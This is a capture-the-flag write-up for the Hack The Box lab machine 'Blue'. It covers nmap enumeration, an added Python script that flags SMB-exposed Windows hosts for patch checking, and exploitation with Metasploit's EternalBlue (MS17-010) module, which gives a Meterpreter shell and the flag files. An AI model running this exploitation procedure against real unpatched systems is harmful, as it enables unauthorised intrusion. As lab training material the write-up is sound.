Blue
2025-07-01 09:42
Status: Solved
Difficulty: Easy
Blue - HTB
Enumeration
Starting with a port scan, we can observe that we are dealing with a Windows machine possibly vulnerable to the notorious
nmap -sV 10.10.10.40
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-01 08:39 CEST
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 08:40 (0:00:42 remaining)
Nmap scan report for 10.10.10.40
Host is up (0.029s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.31 seconds
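To turn a scan like the one above into an exposure list for patch triage, this added example (not part of the original write-up) parses nmap -sV normal output and flags hosts with 445/tcp open on a Windows banner. The function names are this example's own, and the sample input is copied from the scan output above.

```python
import re

# Sample input: the relevant lines of the scan output shown above.
SAMPLE = """\
Nmap scan report for 10.10.10.40
Host is up (0.029s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([0-9a-fA-F.:]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
INFO_RE = re.compile(r"^Service Info: (.*)$")

def parse_nmap(text):
    """Return {ip: {"ports": [...], "info": {...}}} from nmap -sV normal output."""
    hosts, cur = {}, None
    for line in text.splitlines():
        line = line.strip()
        if m := HOST_RE.match(line):
            cur = hosts.setdefault(m.group(1), {"ports": [], "info": {}})
        elif cur is None:
            continue  # ignore banner lines before the first host report
        elif m := PORT_RE.match(line):
            port, proto, state, service, version = m.groups()
            cur["ports"].append({"port": int(port), "proto": proto, "state": state,
                                 "service": service, "version": version or ""})
        elif m := INFO_RE.match(line):
            for field in m.group(1).split(";"):
                key, _, value = field.strip().partition(": ")
                cur["info"][key] = value
    return hosts

def smb_exposed(hosts):
    """List hosts with 445/tcp open on a Windows banner (MS17-010 patch-check candidates)."""
    findings = []
    for ip, data in hosts.items():
        for p in data["ports"]:
            if p["port"] == 445 and p["state"] == "open" and "Windows" in p["version"]:
                findings.append((ip, data["info"].get("Host", "?"), p["version"]))
    return findings

if __name__ == "__main__":
    for ip, name, banner in smb_exposed(parse_nmap(SAMPLE)):
        print(f"{ip} ({name}): SMB exposed, banner '{banner}' - verify MS17-010 patch level")
```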
Exploitation
It's a no-brainer to check for the EternalBlue vulnerability with Metasploit.
I'm going to use the windows/smb/ms17_010_eternalblue exploit with the options RHOSTS=10.10.10.40 and LHOST=10.10.14.6.
Running check against the target, Metasploit confirms my suspicion of the EternalBlue vulnerability:
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
Running the exploit, we get a Meterpreter shell on the target.
A non-default directory beneath the Users directory is haris, which is the same name we saw in the nmap scan under the host section, so we should definitely check this user.
After some traversing, we can find the user.txt flag in the haris/Desktop folder.
With the same logic, we also find the root.txt inside the Administrator user's desktop folder.